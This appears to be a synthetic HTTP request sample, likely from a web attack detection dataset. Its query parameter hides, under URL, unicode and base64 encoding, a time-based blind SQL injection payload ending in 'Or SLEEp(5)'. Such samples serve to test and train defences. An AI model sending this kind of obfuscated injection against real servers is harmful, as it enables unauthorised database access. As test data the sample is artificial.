HEAD /takeaway?evolution=malware&region=fetch&expression=concurrent&base=%09%7B%22%5Cu0070%5Cu0061%5Cu0072%5Cu0065%5Cu006E%5Cu0074%5Cu0068%5Cu0065%5Cu0073%5Cu0069%5Cu0073%22%09%20%3Atrue%09%2C%0A%22%5Cu0074%5Cu006F%5Cu006C%5Cu0065%5Cu0072%5Cu0061%5Cu006E%5Cu0063%5Cu0065%22%0D%3A%0A%0A%7B%20%20%22%5Cu0062%5Cu0069%5Cu006e%5Cu0064%22%0A%3A%7B%0D%0D%22%5Cu0065%5Cu0078%5Cu0074%5Cu0072%5Cu0061%22%0A%3A%09%22%5Cu0066%5Cu0065%5Cu0074%5Cu0063%5Cu0068%22%20%20%7D%0D%7D%09%2C%22%5Cu0072%5Cu0065%5Cu0074%5Cu0061%5Cu0069%5Cu006e%22%3Atrue%2C%22%5Cu0076%5Cu0075%5Cu006c%5Cu006e%5Cu0065%5Cu0072%5Cu0061%5Cu0062%5Cu0069%5Cu006c%5Cu0069%5Cu0074%5Cu0079%22%09%3A%0D%0Afalse%0A%09%2C%22%5Cu0065%5Cu0070%5Cu0068%5Cu0065%5Cu006D%5Cu0065%5Cu0072%5Cu0061%5Cu006C%22%0D%09%3A%5Btrue%20%2Cfalse%2C%22%5Cu006f%5Cu0062%5Cu0074%5Cu0061%5Cu0069%5Cu006e%22%0A%09%5D%0D%2C%22%5Cu0070%5Cu0072%5Cu0065%5Cu0066%5Cu0069%5Cu0078%22%0A%20%3A%0D%0D%5B%09%22%5Cu0069%5Cu006E%5Cu0074%5Cu0065%5Cu0072%5Cu006d%5Cu0069%5Cu0074%5Cu0074%5Cu0065%5Cu006E%5Cu0074%22%0A%2C%09%22%5Cu0049%5Cu0069%5Cu006B%5Cu0070%5Cu0044%5Cu0053%5Cu0030%5Cu0074%5Cu0049%5Cu0047%5Cu004e%5Cu0073%5Cu0061%5Cu0058%5Cu0042%5Cu0077%5Cu0063%5Cu006D%5Cu006c%5Cu0032%5Cu0059%5Cu0058%5Cu0052%5Cu006C%5Cu0063%5Cu0047%5Cu0039%5Cu0070%5Cu0062%5Cu006e%5Cu0052%5Cu007A%5Cu0063%5Cu0032%5Cu0056%5Cu007a%5Cu0063%5Cu0032%5Cu006c%5Cu0076%5Cu0062%5Cu006d%5Cu0046%5Cu0079%5Cu0063%5Cu006d%5Cu0039%5Cu0033%5Cu0049%5Cu0041%5Cu0070%5Cu0050%5Cu0063%5Cu0069%5Cu0042%5Cu0054%5Cu0054%5Cu0045%5Cu0056%5Cu0046%5Cu0063%5Cu0043%5Cu0067%5Cu0031%5Cu004b%5Cu0054%5Cu0030%5Cu0069%22%0A%5D%7D%0A HTTP/1.1
Host: example.com
Cache-Control: no-cache
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Cookie: trigger=schema; mutable=authentication; SESSIONID=cf66512b0d93c43149a2be6ef63246f5ec133f02f5b1e4ea830ed190db68b670dc542fd630cfa1ed759d26b47ec00659

